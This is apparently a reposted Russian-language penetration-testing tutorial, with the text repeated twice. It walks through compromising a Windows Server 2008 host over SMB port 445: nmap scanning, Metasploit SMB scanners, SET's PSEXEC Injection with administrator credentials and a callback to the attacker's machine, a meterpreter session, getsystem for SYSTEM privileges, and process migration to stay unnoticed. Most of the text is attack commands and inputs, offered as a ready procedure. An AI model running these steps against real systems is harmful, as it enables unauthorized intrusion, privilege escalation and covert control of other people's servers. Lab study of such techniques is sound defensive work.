Материал взят с другого источника.
В этой статье я опишу процедуру тестирования на проникновение целевого хоста под управлением Windows Server 2008.
Целью будет получение активной сессии meterpreter, на компьютере тестирующего.
В качестве платформы для проведения теста, мною будет использоваться Kali Linux 2016.2.
Итак, для начала немного информации, атака будет производиться используя уязвимости версии протокола SMB 2.2
SMB (Server Message Block) — сетевой протокол прикладного уровня для удалённого доступа к файлам, принтерам и другим сетевым ресурсам, а также для межпроцессорного взаимодействия.
Подвергаться эксплуатации в нашем случае будет 445 порт.
445/TCP,UDP MICROSOFT-DS — используется в Microsoft Windows 2000 и поздних версий, для прямого TCP/IP-доступа без использования NetBIOS.
Узнаем адрес сервера в сети и начнем со сканирования:
> nmap –sV –A 192.168.31.133
Первый положительный момент выделен, на сервере открыт интересующий нас порт.
Второй момент, это наличие включенного сервиса smbv2. Теперь необходимо узнать больше о версии протокола SMB.
Запустим Metasploit Framework и выполним последовательно следующее:
> use auxiliary/scanner/smb/smb_version
> msf exploit (smb_version)>set rhosts 192.168.31.ХХХ
> msf exploit (smb_version)>exploit
Затем выполним:
> use auxiliary/scanner/smb/smb2
> msf exploit (smb2)>set rhosts 192.168.0.XXX
> msf exploit (smb2)>set rport 445
> msf exploit (smb2)>exploit
Версия протокола и его наличие нам стали известны. Теперь можно переходить непосредственно к проникновению.
Запускаем SET - Social Engineering Toolkit.
> setoolkit
Выбираем второй пункт (2):
Будем использовать PSEXEC Injection, выбираем (6):
Вводим данные согласно требованиям SET:
> 192.168.31.133 (Адрес целевого хоста)
> Administrator (Логин целевого хоста)
> Adminroot123 (Пароль целевого хоста)
> Следующий пункт пропускаем, жмем Enter
> Следующий пункт пропускаем, жмем Enter
> 192.168.31.201 (Адрес атакующей машины)
> 445 (SMB порт)
Если все прошло успешно, то в течение нескольких секунд запустится Metasploit, а затем откроется сессия meterpreter для доступа на целевой хост.
Проверяем работоспособность эксплойта и получаем системные привилегии:
> sessions –I 1
> sysinfo
> getsystem
Посмотрим список запущенных процессов:
> ps
Сам сервер, во время манипуляций ведет себя тихо, разве, что в tasklist появятся новые процессы, но с помощью миграции все поправимо:
Дальше действуем на свое усмотрение. В целом, на этом все. Спасибо за внимание.
В этой статье я опишу процедуру тестирования на проникновение целевого хоста под управлением Windows Server 2008.

Целью будет получение активной сессии meterpreter, на компьютере тестирующего.
В качестве платформы для проведения теста, мною будет использоваться Kali Linux 2016.2.
Итак, для начала немного информации, атака будет производиться используя уязвимости версии протокола SMB 2.2
SMB (Server Message Block) — сетевой протокол прикладного уровня для удалённого доступа к файлам, принтерам и другим сетевым ресурсам, а также для межпроцессорного взаимодействия.
Подвергаться эксплуатации в нашем случае будет 445 порт.
445/TCP,UDP MICROSOFT-DS — используется в Microsoft Windows 2000 и поздних версий, для прямого TCP/IP-доступа без использования NetBIOS.
Узнаем адрес сервера в сети и начнем со сканирования:
> nmap –sV –A 192.168.31.133

Первый положительный момент выделен, на сервере открыт интересующий нас порт.

Второй момент, это наличие включенного сервиса smbv2. Теперь необходимо узнать больше о версии протокола SMB.
Запустим Metasploit Framework и выполним последовательно следующее:
> use auxiliary/scanner/smb/smb_version
> msf exploit (smb_version)>set rhosts 192.168.31.ХХХ
> msf exploit (smb_version)>exploit

Затем выполним:
> use auxiliary/scanner/smb/smb2
> msf exploit (smb2)>set rhosts 192.168.0.XXX
> msf exploit (smb2)>set rport 445
> msf exploit (smb2)>exploit

Версия протокола и его наличие нам стали известны. Теперь можно переходить непосредственно к проникновению.
Запускаем SET - Social Engineering Toolkit.
> setoolkit

Выбираем второй пункт (2):

Будем использовать PSEXEC Injection, выбираем (6):

Вводим данные согласно требованиям SET:
> 192.168.31.133 (Адрес целевого хоста)
> Administrator (Логин целевого хоста)
> Adminroot123 (Пароль целевого хоста)
> Следующий пункт пропускаем, жмем Enter
> Следующий пункт пропускаем, жмем Enter
> 192.168.31.201 (Адрес атакующей машины)
> 445 (SMB порт)

Если все прошло успешно, то в течение нескольких секунд запустится Metasploit, а затем откроется сессия meterpreter для доступа на целевой хост.

Проверяем работоспособность эксплойта и получаем системные привилегии:
> sessions –I 1
> sysinfo
> getsystem

Посмотрим список запущенных процессов:
> ps

Сам сервер, во время манипуляций ведет себя тихо, разве, что в tasklist появятся новые процессы, но с помощью миграции все поправимо:

Дальше действуем на свое усмотрение. В целом, на этом все. Спасибо за внимание.